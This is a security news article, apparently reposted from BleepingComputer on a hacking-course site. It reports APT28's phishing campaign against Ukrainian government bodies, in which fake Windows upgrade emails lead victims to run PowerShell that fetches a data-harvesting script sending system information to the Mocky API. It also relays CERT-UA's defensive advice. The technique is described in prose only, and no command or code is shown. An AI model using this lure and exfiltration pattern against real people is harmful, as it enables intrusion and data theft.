Russian hackers use fake Windows updates to target Ukrainian government

by | May 1, 2023 | News

Premium Content

Patreon
Subscribe to Patreon to watch this episode.
Reading Time: 3 Minutes

APT28 Uses Fake Windows Upgrade Emails to Target Ukrainian Government Bodies

 

Russian state-sponsored hacking group APT28 (also known as Fancy Bear) is targeting various government bodies in Ukraine with malicious emails, posing as instructions on how to upgrade Windows for cyberattack defense, according to the Computer Emergency Response Team of Ukraine (CERT-UA).

The attackers created @outlook.com email addresses using the real employee names they acquired in the preparatory stages of the attack. Instead of legitimate instructions on upgrading Windows systems, the emails advise the recipients to run a PowerShell command, which downloads a PowerShell script on the computer. The script then simulates a Windows updating process while downloading a second PowerShell payload in the background.

The second-stage payload is an information harvesting tool that abuses the ‘tasklist’ and ‘systeminfo’ commands to gather data and sends it to a Mocky service API via an HTTP request. Mocky is a legitimate application that APT28 abused for data exfiltration.

Instructions sent to targetsInstructions sent to targets (CERT-UA)

See Also: So you want to be a hacker?
Offensive Security, Bug Bounty Courses

CERT-UA recommends system administrators restrict PowerShell and monitor network traffic

CERT-UA recommends that system administrators monitor network traffic for connections to the Mocky service API and restrict the ability to launch PowerShell on critical computers.

This comes as Google’s Threat Analysis Group reports that 60% of all phishing emails targeting Ukraine in Q1 2023 originated from Russian threat actors, highlighting APT28’s contribution to malicious activity. Earlier in the month, US and UK intelligence services and Cisco warned about APT28 actively exploiting a zero-day flaw affecting the company’s routers to deploy a malware named ‘Jaguar Tooth’ to collect intelligence from US and EU-based targets.

In March 2023, Microsoft patched an Outlook zero-day vulnerability tracked as CVE-2023-23397, which APT28 has exploited since April 2022 to breach the networks of European government, military, energy, and transportation organizations. Notably, Chinese hackers also used Windows updates as a lure to drop malicious executables in attacks against Russian government agencies last year.

Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?

If you want to express your idea in an article contact us here for a quote: [email protected]

Source: bleepingcomputer.com

Source Link

Merch

Recent News

EXPLORE OUR STORE

Offensive Security & Ethical Hacking Course

Begin the learning curve of hacking now!


Information Security Solutions

Find out how Pentesting Services can help you.


Join our Community

Share This